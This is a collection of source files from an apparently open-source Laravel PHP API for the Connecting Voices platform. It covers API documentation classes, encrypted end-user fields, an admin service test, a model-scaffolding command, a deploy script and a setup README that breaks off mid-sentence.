"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Docs\\Paths\\Tags;\n\nuse App\\Docs\\Operations\\Tags\\IndexTagOperation;\nuse App\\Docs\\Operations\\Tags\\StoreTagOperation;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\BaseObject;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\PathItem;\n\nclass TagsRootPath extends PathItem\n{\n /**\n * @param string|null $objectId\n * @throws \\GoldSpecDigital\\ObjectOrientedOAS\\Exceptions\\InvalidArgumentException\n * @return \\GoldSpecDigital\\ObjectOrientedOAS\\Objects\\PathItem\n */\n public static function create(string $objectId = null): BaseObject\n {\n return parent::create($objectId)\n ->route('/tags')\n ->operations(\n IndexTagOperation::create(),\n StoreTagOperation::create()\n );\n }\n}\n"
},
{
"alpha_fraction": 0.606521725654602,
"alphanum_fraction": 0.6086956262588501,
"avg_line_length": 28.677419662475586,
"blob_id": "fd8c0b368584f369ca01945d1b2701ac98043b9a",
"content_id": "f93e7cbb51b59ed54b098014466041a2e5a5928b",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 920,
"license_type": "permissive",
"max_line_length": 70,
"num_lines": 31,
"path": "/app/Docs/Info.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Docs;\n\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\BaseObject;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Contact;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Info as BaseInfo;\nuse Illuminate\\Support\\Facades\\Config;\n\nclass Info extends BaseInfo\n{\n /**\n * @param string|null $objectId\n * @return \\GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Info\n */\n public static function create(string $objectId = null): BaseObject\n {\n return parent::create($objectId)\n ->title(Config::get('app.name') . ' API')\n ->description('Documentation on how to use the API')\n ->contact(\n Contact::create()\n ->name(Config::get('ayup.name'))\n ->url(Config::get('ayup.url'))\n ->email(Config::get('ayup.email'))\n )\n ->version('v1');\n }\n}\n"
},
{
"alpha_fraction": 0.5827505588531494,
"alphanum_fraction": 0.5850815773010254,
"avg_line_length": 16.15999984741211,
"blob_id": "3a4c6a04933ade7b3e7c5044b9c8e73cc94298d3",
"content_id": "4e634f1c61300e5060d3bf43dab8fde9fb9c6e95",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 429,
"license_type": "permissive",
"max_line_length": 57,
"num_lines": 25,
"path": "/app/Models/Mutators/SettingMutators.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Models\\Mutators;\n\ntrait SettingMutators\n{\n /**\n * @param string $value\n * @return mixed\n */\n public function getValueAttribute(string $value)\n {\n return json_decode($value, true);\n }\n\n /**\n * @param mixed $value\n */\n public function setValueAttribute($value): void\n {\n $this->attributes['value'] = json_encode($value);\n }\n}\n"
},
{
"alpha_fraction": 0.539531946182251,
"alphanum_fraction": 0.5536580085754395,
"avg_line_length": 29.403846740722656,
"blob_id": "98b7aca3c565d113d5ff94427e9752b16b020a63",
"content_id": "f97cbd80040ef44f9a73cd8d930cca9dabed3474",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 4743,
"license_type": "permissive",
"max_line_length": 96,
"num_lines": 156,
"path": "/tests/Unit/Services/AdminServiceTest.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace Tests\\Unit\\Services;\n\nuse App\\Events\\Admin\\AdminCreated;\nuse App\\Events\\Admin\\AdminDeleted;\nuse App\\Events\\Admin\\AdminUpdated;\nuse App\\Models\\Admin;\nuse App\\Services\\AdminService;\nuse Illuminate\\Support\\Facades\\Event;\nuse Illuminate\\Support\\Facades\\Hash;\nuse Tests\\TestCase;\n\nclass AdminServiceTest extends TestCase\n{\n /** @test */\n public function it_creates_a_user_and_admin_record(): void\n {\n /** @var \\App\\Services\\AdminService $adminService */\n $adminService = resolve(AdminService::class);\n\n $admin = $adminService->create([\n 'name' => 'John',\n 'email' => '[email protected]',\n 'phone' => '07700000000',\n 'password' => 'secret',\n ]);\n\n $this->assertDatabaseHas('admins', ['id' => $admin->id]);\n $this->assertDatabaseHas('users', ['id' => $admin->user_id]);\n $this->assertEquals('John', $admin->name);\n $this->assertEquals('[email protected]', $admin->user->email);\n $this->assertEquals('07700000000', $admin->phone);\n $this->assertTrue(Hash::check('secret', $admin->user->password));\n }\n\n /** @test */\n public function it_dispatches_an_event_when_created(): void\n {\n Event::fake([AdminCreated::class]);\n\n /** @var \\App\\Services\\AdminService $adminService */\n $adminService = resolve(AdminService::class);\n\n $admin = $adminService->create([\n 'name' => 'John',\n 'email' => '[email protected]',\n 'phone' => '07700000000',\n 'password' => 'secret',\n ]);\n\n Event::assertDispatched(\n AdminCreated::class,\n function (AdminCreated $event) use ($admin): bool {\n return $event->getAdmin()->is($admin);\n }\n );\n }\n\n /** @test */\n public function it_throws_exception_when_needed_values_for_creation_are_not_provided(): void\n {\n $this->expectException(\\ErrorException::class);\n\n /** @var \\App\\Services\\AdminService $adminService */\n $adminService = resolve(AdminService::class);\n\n $adminService->create([]);\n }\n\n /** @test */\n public function it_updates_a_user_and_admin_record(): void\n {\n /** @var \\App\\Services\\AdminService $adminService */\n $adminService = resolve(AdminService::class);\n\n /** @var \\App\\Models\\Admin $admin */\n $admin = factory(Admin::class)->create();\n\n $adminService->update($admin, [\n 'name' => 'Foo Bar',\n 'phone' => '07777777777',\n 'email' => '[email protected]',\n 'password' => 'password',\n ]);\n\n $this->assertEquals('Foo Bar', $admin->name);\n $this->assertEquals('[email protected]', $admin->user->email);\n $this->assertEquals('07777777777', $admin->phone);\n $this->assertTrue(Hash::check('password', $admin->user->password));\n }\n\n /** @test */\n public function it_dispatches_an_event_when_updated(): void\n {\n Event::fake([AdminUpdated::class]);\n\n /** @var \\App\\Services\\AdminService $adminService */\n $adminService = resolve(AdminService::class);\n\n /** @var \\App\\Models\\Admin $admin */\n $admin = factory(Admin::class)->create();\n\n $adminService->update($admin, [\n 'name' => 'Foo Bar',\n 'phone' => '07777777777',\n 'email' => '[email protected]',\n 'password' => 'password',\n ]);\n\n Event::assertDispatched(\n AdminUpdated::class,\n function (AdminUpdated $event) use ($admin): bool {\n return $event->getAdmin()->is($admin);\n }\n );\n }\n\n /** @test */\n public function it_deletes_a_user_and_admin_record(): void\n {\n /** @var \\App\\Services\\AdminService $adminService */\n $adminService = resolve(AdminService::class);\n\n /** @var \\App\\Models\\Admin $admin */\n $admin = factory(Admin::class)->create();\n\n $adminService->delete($admin);\n\n $this->assertDatabaseMissing('admins', ['id' => $admin->id]);\n $this->assertDatabaseMissing('users', ['id' => $admin->user_id]);\n }\n\n /** @test */\n public function it_dispatches_an_event_when_deleted(): void\n {\n Event::fake([AdminDeleted::class]);\n\n /** @var \\App\\Services\\AdminService $adminService */\n $adminService = resolve(AdminService::class);\n\n /** @var \\App\\Models\\Admin $admin */\n $admin = factory(Admin::class)->create();\n\n $adminService->delete($admin);\n\n Event::assertDispatched(\n AdminDeleted::class,\n function (AdminDeleted $event) use ($admin): bool {\n return $event->getAdmin()->is($admin);\n }\n );\n }\n}\n"
},
{
"alpha_fraction": 0.6458569765090942,
"alphanum_fraction": 0.646992027759552,
"avg_line_length": 24.171428680419922,
"blob_id": "3189dd4e4ec253d0e2b6004f8bc7a79a7c1f228b",
"content_id": "fa307457f60f632a0e55d170d434563e0dd3e73e",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 881,
"license_type": "permissive",
"max_line_length": 103,
"num_lines": 35,
"path": "/database/migrations/2019_05_29_103217_create_notification_channels_table.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nuse Illuminate\\Database\\Migrations\\Migration;\nuse Illuminate\\Database\\Schema\\Blueprint;\nuse Illuminate\\Support\\Facades\\DB;\nuse Illuminate\\Support\\Facades\\Schema;\n\nclass CreateNotificationChannelsTable extends Migration\n{\n /**\n * Run the migrations.\n */\n public function up(): void\n {\n Schema::create('notification_channels', function (Blueprint $table): void {\n $table->string('channel')->primary();\n });\n\n $notificationChannelsPath = realpath(dirname(__DIR__)) . '/storage/notification_channels.json';\n\n DB::table('notification_channels')->insert(\n json_decode(file_get_contents($notificationChannelsPath), true)\n );\n }\n\n /**\n * Reverse the migrations.\n */\n public function down(): void\n {\n Schema::dropIfExists('notification_channels');\n }\n}\n"
},
{
"alpha_fraction": 0.6630630493164062,
"alphanum_fraction": 0.6648648381233215,
"avg_line_length": 18.821428298950195,
"blob_id": "b2c63bb4b5d044ca9ce16460f769792309211b4b",
"content_id": "2a8398f00b05f79767c28821a3d32a8b5b032e44",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 555,
"license_type": "permissive",
"max_line_length": 64,
"num_lines": 28,
"path": "/app/Models/Relationships/FileTokenRelationships.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Models\\Relationships;\n\nuse App\\Models\\File;\nuse App\\Models\\User;\nuse Illuminate\\Database\\Eloquent\\Relations\\BelongsTo;\n\ntrait FileTokenRelationships\n{\n /**\n * @return \\Illuminate\\Database\\Eloquent\\Relations\\BelongsTo\n */\n public function file(): BelongsTo\n {\n return $this->belongsTo(File::class);\n }\n\n /**\n * @return \\Illuminate\\Database\\Eloquent\\Relations\\BelongsTo\n */\n public function user(): BelongsTo\n {\n return $this->belongsTo(User::class);\n }\n}\n"
},
{
"alpha_fraction": 0.5776458978652954,
"alphanum_fraction": 0.578635036945343,
"avg_line_length": 23.071428298950195,
"blob_id": "20ebdd0a64362ae14f7390f99f59ccb7a94c7dee",
"content_id": "16a06efa0603503cb5b998ef28d589ba799fbb14",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 2022,
"license_type": "permissive",
"max_line_length": 84,
"num_lines": 84,
"path": "/app/Providers/RouteServiceProvider.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Providers;\n\nuse App\\Models\\Admin;\nuse Illuminate\\Foundation\\Support\\Providers\\RouteServiceProvider as ServiceProvider;\nuse Illuminate\\Http\\Response;\nuse Illuminate\\Support\\Facades\\Route;\n\nclass RouteServiceProvider extends ServiceProvider\n{\n /**\n * This namespace is applied to your controller routes.\n *\n * In addition, it is set as the URL generator's root namespace.\n *\n * @var string\n */\n protected $namespace = 'App\\Http\\Controllers';\n\n /**\n * Define your route model bindings, pattern filters, etc.\n */\n public function boot(): void\n {\n Route::bind('admin', function ($value): Admin {\n return Admin::find($value)\n ?? optional(request()->user('api'))->admin\n ?? abort(Response::HTTP_NOT_FOUND);\n });\n\n parent::boot();\n }\n\n /**\n * Define the routes for the application.\n */\n public function map(): void\n {\n $this->mapApiRoutes();\n\n $this->mapWebRoutes();\n\n $this->mapPassportRoutes();\n }\n\n /**\n * Define the \"web\" routes for the application.\n *\n * These routes all receive session state, CSRF protection, etc.\n */\n protected function mapWebRoutes(): void\n {\n Route::middleware('web')\n ->namespace($this->namespace)\n ->group(base_path('routes/web.php'));\n }\n\n /**\n * Define the \"api\" routes for the application.\n *\n * These routes are typically stateless.\n */\n protected function mapApiRoutes(): void\n {\n Route::middleware('api')\n ->namespace(\"{$this->namespace}\\V1\")\n ->group(base_path('routes/api.php'));\n }\n\n /**\n * Define the \"passport\" routes for the application.\n *\n * These routes are for OAuth.\n */\n protected function mapPassportRoutes(): void\n {\n Route::prefix('oauth')\n ->as('passport.')\n ->group(base_path('routes/passport.php'));\n }\n}\n"
},
{
"alpha_fraction": 0.566957414150238,
"alphanum_fraction": 0.5674704909324646,
"avg_line_length": 22.202381134033203,
"blob_id": "ea11648415e6bcbb37a3b64bf1bf3f11ae43dff5",
"content_id": "9b9f6009e2247458121f43343410caf6776b6ce2",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 1949,
"license_type": "permissive",
"max_line_length": 70,
"num_lines": 84,
"path": "/app/Models/Mutators/EndUserMutators.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Models\\Mutators;\n\ntrait EndUserMutators\n{\n /**\n * @param string|null $country\n * @return string|null\n */\n public function getCountryAttribute(?string $country): ?string\n {\n return is_string($country) ? decrypt($country) : null;\n }\n\n /**\n * @param string|null $country\n */\n public function setCountryAttribute(?string $country): void\n {\n $this->attributes['country'] = is_string($country)\n ? encrypt($country)\n : null;\n }\n\n /**\n * @param string|null $birthYear\n * @return int|null\n */\n public function getBirthYearAttribute(?string $birthYear): ?int\n {\n return is_string($birthYear) ? decrypt($birthYear) : null;\n }\n\n /**\n * @param int|null $birthYear\n */\n public function setBirthYearAttribute(?int $birthYear): void\n {\n $this->attributes['birth_year'] = is_int($birthYear)\n ? encrypt($birthYear)\n : null;\n }\n\n /**\n * @param string|null $gender\n * @return string|null\n */\n public function getGenderAttribute(?string $gender): ?string\n {\n return is_string($gender) ? decrypt($gender) : null;\n }\n\n /**\n * @param string|null $gender\n */\n public function setGenderAttribute(?string $gender): void\n {\n $this->attributes['gender'] = is_string($gender)\n ? encrypt($gender)\n : null;\n }\n\n /**\n * @param string|null $ethnicity\n * @return string|null\n */\n public function getEthnicityAttribute(?string $ethnicity): ?string\n {\n return is_string($ethnicity) ? decrypt($ethnicity) : null;\n }\n\n /**\n * @param string|null $ethnicity\n */\n public function setEthnicityAttribute(?string $ethnicity): void\n {\n $this->attributes['ethnicity'] = is_string($ethnicity)\n ? encrypt($ethnicity)\n : null;\n }\n}\n"
},
{
"alpha_fraction": 0.49185749888420105,
"alphanum_fraction": 0.49312976002693176,
"avg_line_length": 20.243244171142578,
"blob_id": "0610efc2cfb3b7b630c421d76a32ee87387f401f",
"content_id": "7504eff2ecaa9e74bf4e4ee069d79287b705d7d9",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 3930,
"license_type": "permissive",
"max_line_length": 90,
"num_lines": 185,
"path": "/app/Console/Commands/Cv/Make/ModelCommand.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Console\\Commands\\Cv\\Make;\n\nuse Illuminate\\Console\\Command;\n\nclass ModelCommand extends Command\n{\n /**\n * The name and signature of the console command.\n *\n * @var string\n */\n protected $signature = 'cv:make:model \n {name : The name of the class}';\n\n /**\n * The console command description.\n *\n * @var string\n */\n protected $description = 'Create a new Eloquent model class along with useful traits';\n\n /**\n * Execute the console command.\n *\n * @throws \\Exception\n */\n public function handle(): void\n {\n $name = $this->argument('name');\n\n if (!$this->checkIfModelExists($name)) {\n return;\n }\n\n $this->makeModelClass($name);\n $this->makeMutatorsTrait($name);\n $this->makeRelationshipsTrait($name);\n $this->makeScopesTrait($name);\n\n $this->info(\"{$name} model and traits created successfully.\");\n }\n\n /**\n * @param string $name\n * @return bool\n */\n protected function checkIfModelExists(string $name): bool\n {\n if (is_file(app_path(\"Models/{$name}.php\"))) {\n $this->error(\"{$name} model already exists.\");\n\n return false;\n }\n\n if (is_file(app_path(\"Models/Mutators/{$name}Mutators.php\"))) {\n $this->error(\"{$name} mutators already exist.\");\n\n return false;\n }\n\n if (is_file(app_path(\"Models/Relationships/{$name}Relationships.php\"))) {\n $this->error(\"{$name} relationships already exist.\");\n\n return false;\n }\n\n if (is_file(app_path(\"Models/Scopes/{$name}Scopes.php\"))) {\n $this->error(\"{$name} scopes already exist.\");\n\n return false;\n }\n\n return true;\n }\n\n /**\n * @param string $name\n */\n protected function makeModelClass(string $name): void\n {\n $contents = <<<EOT\n <?php\n \n declare(strict_types=1);\n \n namespace App\\Models;\n \n use GoldSpecDigital\\LaravelEloquentUUID\\Database\\Eloquent\\Model;\n \n class {$name} extends BaseModel\n {\n use Mutators\\\\{$name}Mutators;\n use Relationships\\\\{$name}Relationships;\n use Scopes\\\\{$name}Scopes;\n \n //\n }\n \n EOT;\n\n file_put_contents(\n app_path(\"Models/{$name}.php\"),\n $contents\n );\n }\n\n /**\n * @param string $name\n */\n protected function makeMutatorsTrait(string $name): void\n {\n $contents = <<<EOT\n <?php\n \n declare(strict_types=1);\n \n namespace App\\Models\\Mutators;\n \n trait {$name}Mutators\n {\n //\n }\n \n EOT;\n\n file_put_contents(\n app_path(\"Models/Mutators/{$name}Mutators.php\"),\n $contents\n );\n }\n\n /**\n * @param string $name\n */\n protected function makeRelationshipsTrait(string $name): void\n {\n $contents = <<<EOT\n <?php\n \n declare(strict_types=1);\n \n namespace App\\Models\\Relationships;\n \n trait {$name}Relationships\n {\n //\n }\n \n EOT;\n\n file_put_contents(\n app_path(\"Models/Relationships/{$name}Relationships.php\"),\n $contents\n );\n }\n\n /**\n * @param string $name\n */\n protected function makeScopesTrait(string $name): void\n {\n $contents = <<<EOT\n <?php\n \n declare(strict_types=1);\n \n namespace App\\Models\\Scopes;\n \n trait {$name}Scopes\n {\n //\n }\n \n EOT;\n\n file_put_contents(\n app_path(\"Models/Scopes/{$name}Scopes.php\"),\n $contents\n );\n }\n}\n"
},
{
"alpha_fraction": 0.7150423526763916,
"alphanum_fraction": 0.7150423526763916,
"avg_line_length": 27.606060028076172,
"blob_id": "a3fcffb45414e0f7290e7ff07538d300a6788b44",
"content_id": "7d1ba97c22b4c9ae47800df196f9b42803ca23e0",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 944,
"license_type": "permissive",
"max_line_length": 75,
"num_lines": 33,
"path": "/.travis/deploy.sh",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env bash\n\n# Requires the following environment variables:\n# $TRAVIS_BRANCH = The name of the git branch that the build is running on.\n# REPO_URI = The URI of the ECR repo to push to.\n# CLUSTER = The name of the ECS cluster to deploy to.\n\n# Bail out on first error.\nset -e\n\n# Get the environment from the branch.\ncase ${TRAVIS_BRANCH} in\n master )\n ENVIRONMENT=production\n ;;\n develop )\n ENVIRONMENT=staging\n ;;\nesac\n\n# Declare the configuration variables for the deployment.\necho \"Setting deployment configuration for ${DEPLOYMENT}...\"\nexport ENV_SECRET_ID=\".env.api.${ENVIRONMENT}\"\nexport PUBLIC_KEY_SECRET_ID=\"oauth-public.key.${ENVIRONMENT}\"\nexport PRIVATE_KEY_SECRET_ID=\"oauth-private.key.${ENVIRONMENT}\"\n\n# Build the image.\n./docker/build.sh\n\n# Deploy the update to the services.\nSERVICE=\"api\" ./docker/deploy.sh\nSERVICE=\"scheduler\" ./docker/deploy.sh\nSERVICE=\"queue-worker\" ./docker/deploy.sh\n"
},
{
"alpha_fraction": 0.4979960024356842,
"alphanum_fraction": 0.4989979863166809,
"avg_line_length": 23.341463088989258,
"blob_id": "75e975f862637e9faff4f178a7ba8e773e672c48",
"content_id": "8df8a024130cdb57430889ae90cde37db50f86c3",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 998,
"license_type": "permissive",
"max_line_length": 58,
"num_lines": 41,
"path": "/app/Http/Requests/File/DownloadFileRequest.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Http\\Requests\\File;\n\nuse App\\Rules\\ValidFileToken;\nuse Illuminate\\Foundation\\Http\\FormRequest;\nuse Illuminate\\Validation\\Rule;\n\nclass DownloadFileRequest extends FormRequest\n{\n /**\n * Get the validation rules that apply to the request.\n *\n * @return array\n */\n public function rules(): array\n {\n /** @var \\App\\Models\\File $file */\n $file = $this->route('file');\n\n /** @var \\App\\Models\\Admin|null $admin */\n $admin = optional($this->user('api'))->admin;\n\n return [\n 'token' => [\n 'bail',\n Rule::requiredIf(function (): bool {\n /** @var \\App\\Models\\File $file */\n $file = $this->route('file');\n\n return $file->isPrivate();\n }),\n 'string',\n 'exists:file_tokens,id',\n new ValidFileToken($file, $admin),\n ],\n ];\n }\n}\n"
},
{
"alpha_fraction": 0.6768447756767273,
"alphanum_fraction": 0.6793892979621887,
"avg_line_length": 18.649999618530273,
"blob_id": "257139ab315648398dc94b1952a5e30def6faef7",
"content_id": "f457ca2cac8d5cd8584cc02a35b10a6ad4386af3",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 393,
"license_type": "permissive",
"max_line_length": 76,
"num_lines": 20,
"path": "/app/Exceptions/ExporterNotFoundException.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Exceptions;\n\nuse RuntimeException;\n\nclass ExporterNotFoundException extends RuntimeException\n{\n /**\n * ExporterNotFoundException constructor.\n *\n * @param string $exporterClass\n */\n public function __construct(string $exporterClass)\n {\n parent::__construct(\"Exporter class [{$exporterClass}] not found.\");\n }\n}\n"
},
{
"alpha_fraction": 0.6598916053771973,
"alphanum_fraction": 0.6612465977668762,
"avg_line_length": 18.421052932739258,
"blob_id": "ee7d4d75e96dc23d1209d53a825cac49a3082c56",
"content_id": "49b79d464c8f468a836af196432f1bbf23c60371",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 738,
"license_type": "permissive",
"max_line_length": 59,
"num_lines": 38,
"path": "/app/Events/Contribution/ContributionApproved.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Events\\Contribution;\n\nuse App\\Models\\Contribution;\nuse Illuminate\\Foundation\\Events\\Dispatchable;\nuse Illuminate\\Queue\\SerializesModels;\n\nclass ContributionApproved\n{\n use Dispatchable;\n use SerializesModels;\n\n /**\n * @var \\App\\Models\\Contribution\n */\n protected $contribution;\n\n /**\n * ContributionCreated constructor.\n *\n * @param \\App\\Models\\Contribution $contribution\n */\n public function __construct(Contribution $contribution)\n {\n $this->contribution = $contribution;\n }\n\n /**\n * @return \\App\\Models\\Contribution\n */\n public function getContribution(): Contribution\n {\n return $this->contribution;\n }\n}\n"
},
{
"alpha_fraction": 0.6800618171691895,
"alphanum_fraction": 0.6816074252128601,
"avg_line_length": 20.566667556762695,
"blob_id": "daffab9d06673e22efdfe91f58210dee79c0da6a",
"content_id": "24737f89ffc58393b32d820b3074273f3980ab3b",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 647,
"license_type": "permissive",
"max_line_length": 85,
"num_lines": 30,
"path": "/app/Http/Controllers/DocsController.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Http\\Controllers;\n\nuse App\\Docs\\OpenApi;\nuse Illuminate\\Contracts\\Support\\Responsable;\nuse Illuminate\\Contracts\\View\\View;\n\nclass DocsController extends WebController\n{\n /**\n * @return \\Illuminate\\Contracts\\View\\View\n */\n public function index(): View\n {\n return view('docs.index');\n }\n\n /**\n * @throws \\ReflectionException\n * @throws \\GoldSpecDigital\\ObjectOrientedOAS\\Exceptions\\InvalidArgumentException\n * @return \\Illuminate\\Contracts\\Support\\Responsable\n */\n public function openApi(): Responsable\n {\n return OpenApi::create();\n }\n}\n"
},
{
"alpha_fraction": 0.6898733973503113,
"alphanum_fraction": 0.6919831037521362,
"avg_line_length": 21.571428298950195,
"blob_id": "c2b4ee7e290f5b57f5f612278c92fabb1218d4ee",
"content_id": "1280d07929fefaec202b0612748eea735dabe0d3",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 474,
"license_type": "permissive",
"max_line_length": 70,
"num_lines": 21,
"path": "/app/Docs/Tags/EndUsersTag.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Docs\\Tags;\n\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\BaseObject;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Tag;\n\nclass EndUsersTag extends Tag\n{\n /**\n * @param string|null $objectId\n * @return \\GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Tag\n */\n public static function create(string $objectId = null): BaseObject\n {\n return parent::create($objectId)\n ->name('End Users');\n }\n}\n"
},
{
"alpha_fraction": 0.6961832046508789,
"alphanum_fraction": 0.6977099180221558,
"avg_line_length": 21.586206436157227,
"blob_id": "46ff6df9835574aaa0f84718e30368878ffc05ce",
"content_id": "60350cc716937bbabfdedf43164b23dd5cb2c473",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 655,
"license_type": "permissive",
"max_line_length": 68,
"num_lines": 29,
"path": "/app/Models/Relationships/ContributionRelationships.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Models\\Relationships;\n\nuse App\\Models\\EndUser;\nuse App\\Models\\Tag;\nuse Illuminate\\Database\\Eloquent\\Relations\\BelongsTo;\nuse Illuminate\\Database\\Eloquent\\Relations\\BelongsToMany;\n\ntrait ContributionRelationships\n{\n /**\n * @return \\Illuminate\\Database\\Eloquent\\Relations\\BelongsTo\n */\n public function endUser(): BelongsTo\n {\n return $this->belongsTo(EndUser::class);\n }\n\n /**\n * @return \\Illuminate\\Database\\Eloquent\\Relations\\BelongsToMany\n */\n public function tags(): BelongsToMany\n {\n return $this->belongsToMany(Tag::class, 'contribution_tag');\n }\n}\n"
},
{
"alpha_fraction": 0.6181150674819946,
"alphanum_fraction": 0.6193390488624573,
"avg_line_length": 19.94871711730957,
"blob_id": "86e3cd4902eafd8ee6feb56c8890c37979dea2cb",
"content_id": "32c379d3c9d520922bd8695ea03df037c4789d46",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 817,
"license_type": "permissive",
"max_line_length": 67,
"num_lines": 39,
"path": "/app/Http/Responses/ResourceDeletedResponse.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Http\\Responses;\n\nuse Illuminate\\Contracts\\Support\\Responsable;\nuse Illuminate\\Http\\JsonResponse;\n\nclass ResourceDeletedResponse implements Responsable\n{\n /**\n * @var string\n */\n protected $resource;\n\n /**\n * ResourceDeletedResponse constructor.\n *\n * @param string $resource\n */\n public function __construct(string $resource)\n {\n $this->resource = $resource;\n }\n\n /**\n * Create an HTTP response that represents the object.\n *\n * @param \\Illuminate\\Http\\Request $request\n * @return \\Illuminate\\Http\\JsonResponse\n */\n public function toResponse($request): JsonResponse\n {\n return response()->json([\n 'message' => \"The {$this->resource} has been deleted.\",\n ]);\n }\n}\n"
},
{
"alpha_fraction": 0.7464519739151001,
"alphanum_fraction": 0.7486353516578674,
"avg_line_length": 23.756755828857422,
"blob_id": "73f05de05cec1581a6420d8d464efa5a72199cf2",
"content_id": "421664937ae16bff1f63483a0f5b37eb989bd399",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 3664,
"license_type": "permissive",
"max_line_length": 96,
"num_lines": 148,
"path": "/README.md",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "# Connecting Voices - API\n\nThe main API component for the Connecting Voices platform.\n\n## Getting started\n\nThese instructions will get you a copy of the project up and running on your \nlocal machine for development and testing purposes. See deployment for notes on \nhow to deploy the project on a live system.\n\n### Prerequisites\n\nTo run this project, you must have the following installed on your host machine:\n\n* [Docker](https://docs.docker.com/install/)\n\n### The helper script\n\nTo abstract the long commands needed to work with Docker Compose, a helper \nscript called `develop` has been created at the root of the project. This is \nreferenced throughout the rest of this guide and should be used for day-to-day \ntasks when developing.\n\nIt essentially just proxies commands to the relevant docker containers. Feel \nfree to add commands when necessary.\n\n### Installing\n\nStart by building the Docker image and spinning up the development environment:\n\n```bash\n./develop build\n./develop up -d\n```\n\nAt this point you must then download the dependencies and compile the static \nassets:\n\n```bash\n# Install dependencies.\n./develop composer install\n./develop npm install\n\n# Either do a dingle compilation.\n./develop npm run dev\n\n# Or, run a watcher for compilation upon file change.\n./develop npm run watch\n```\n\nNext, configure the environment file:\n\n```bash\n# Copy the example file.\ncp .env.example .env\n\n# Fill out the details needed.\nvim .env\n```\n\nThen generate an application key:\n\n```bash\n./develop art key:generate\n```\n\nNow run the database migrations:\n\n```bash\n# Optionally append \"--seed\" if you want test data to work with.\n./develop art migrate [--seed]\n```\n\nCreate a user for yourself to login with:\n\n```bash\n# If you don't specify a password, one will be generated and outputted for you.\n./develop art cv:make:admin <name> <email> <phone> [--password=secret] \n```\n\nAnd finally create OAuth clients for trusted apps:\n\n```bash\n# Password grant clients (frontend webapp):\n./develop art passport:client --password\n\n# Authorization grant clients (admin webapp):\n./develop art cv:make:client \"Connecting Voices Admin\" \"http://localhost:3000/auth/callback\"\n```\n\nYou should now be able to login 